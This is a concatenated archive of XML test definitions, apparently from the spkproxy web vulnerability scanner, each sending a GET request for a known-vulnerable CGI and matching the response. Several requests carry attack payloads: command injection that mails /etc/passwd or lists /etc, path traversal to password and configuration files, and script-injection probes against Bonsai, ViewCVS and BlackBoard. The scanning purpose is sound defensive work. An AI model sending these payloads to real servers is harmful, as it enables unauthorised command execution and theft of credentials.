(.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1573.xml0100664000076500007650000000723407566204543021752 0ustar davedave (GW5/GWWEB.EXE?HELP=somewhereovertherainbow) "The Gwweb.exe program can allow attackers to view arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}GW5/GWWEB.EXE?HELP=somewhereovertherainbow HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1577.xml0100664000076500007650000000720207566204543021751 0ustar davedave (cgitest.exe) "This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cgitest.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1585.xml0100664000076500007650000000720107566204543021747 0ustar davedave (index.js0x70) "The Weblogic can be tricked into revealing jsp source by adding '0x70' to end of the URL." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}index.js0x70 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ \\<\\%\\= 200 \\<\\%\\= 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1595.xml0100664000076500007650000000726307566204543021760 0ustar davedave (webfind.exe?keywords=01234567890123456789) "May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}webfind.exe?keywords=01234567890123456789 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 500 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 500 spkproxy/VulnXML/DirectoryTests/directorytest-1.xml0100664000076500007650000000703107566204543021506 0ustar davedave (back/) "Back directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}back/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-2.xml0100664000076500007650000000702607566204543021513 0ustar davedave (bak/) "Bak directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}bak/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-3.xml0100664000076500007650000000704007566204543021510 0ustar davedave (_vti_bin/) "Bak directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}_vti_bin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-4.xml0100664000076500007650000000702607566204543021515 0ustar davedave (RPC/) "RPC directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}RPC/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-5.xml0100664000076500007650000000704207566204543021514 0ustar davedave (IISHelp/) "IISHelp directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}IISHelp/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-6.xml0100664000076500007650000000704507566204543021520 0ustar davedave (IISAdmin/) "IISAdmin directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}IISAdmin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-7.xml0100664000076500007650000000704507566204543021521 0ustar davedave (PBServer/) "PBServer directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}PBServer/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-808.xml0100664000076500007650000000725407566204543021674 0ustar davedave ("alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\) "This CGI allows attackers to execute arbitrary commands on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}"alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot\.ini 200 boot\.ini 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-809.xml0100664000076500007650000000751307566204543021673 0ustar davedave (ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-810.xml0100664000076500007650000000730407566204543021661 0ustar davedave (common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|) "Allows attacker to execute commands as http daemon. Upgrade or remove." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ resolv\.conf 200 resolv\.conf 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-811.xml0100664000076500007650000000743707566204543021671 0ustar davedave (cvsblame.cgi?file=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cvsblame.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-812.xml0100664000076500007650000000750307566204543021664 0ustar davedave (cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-813.xml0100664000076500007650000000743307566204543021667 0ustar davedave (cvslog.cgi?file=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cvslog.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-814.xml0100664000076500007650000001002707566204543021661 0ustar davedave (cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-815.xml0100664000076500007650000001005507566204543021663 0ustar davedave (cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-816.xml0100664000076500007650000000756507566204543021700 0ustar davedave (cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-817.xml0100664000076500007650000000724607566204543021675 0ustar davedave (excite;IFS=\"$\";/bin/cat /etc/passwd|mail test@test.com) "Excite software is vulnerable to password file theft remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}excite;IFS=\"$\";/bin/cat /etc/passwd|mail test@test.com HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-818.xml0100664000076500007650000000772607566204543021701 0ustar davedave (FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com) "This CGI allows attackers to read files and execute commands remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-819.xml0100664000076500007650000000733607566204543021677 0ustar davedave (info2www '(../../../../../../../bin/mail root </etc/passwd>) "This CGI allows attackers to execute commands. passwd file may have been mailed to root." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}info2www '(../../../../../../../bin/mail root </etc/passwd> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-820.xml0100664000076500007650000000754707566204543021673 0ustar davedave (login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;) "BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-821.xml0100664000076500007650000000710007566204543021655 0ustar davedave ("sawmill5?rfcf+%22/etc/passwd%22+spbn+1) 1 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}"sawmill5?rfcf+%22/etc/passwd%22+spbn+1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 1 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 1 spkproxy/VulnXML/DirectoryTests/directorytest-822.xml0100664000076500007650000000713607566204543021667 0ustar davedave ("sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1) 1 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}"sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 1 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 1 spkproxy/VulnXML/DirectoryTests/directorytest-823.xml0100664000076500007650000000721007566204543021661 0ustar davedave (shop.pl/page=;cat%20shop.pl|) "Shopping Cart (Hassan) allows execution of remote commands. CAN-2001-0985." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}shop.pl/page=;cat%20shop.pl| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ \\/perl 200 \\/perl 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-824.xml0100664000076500007650000000745307566204543021673 0ustar davedave (showcheckins.cgi?person=<script>alert('Vulnerable')</script>) "Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}showcheckins.cgi?person=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-825.xml0100664000076500007650000000754207566204543021673 0ustar davedave (urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E) "urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-826.xml0100664000076500007650000000760507566204543021674 0ustar davedave (viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>) "ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-827.xml0100664000076500007650000000764707566204543021703 0ustar davedave (viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;) "ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-828.xml0100664000076500007650000000723707566204543021677 0ustar davedave (%2e%2e/abyss.conf) "The Abyss configuration file was successfully retrievd. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}%2e%2e/abyss.conf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 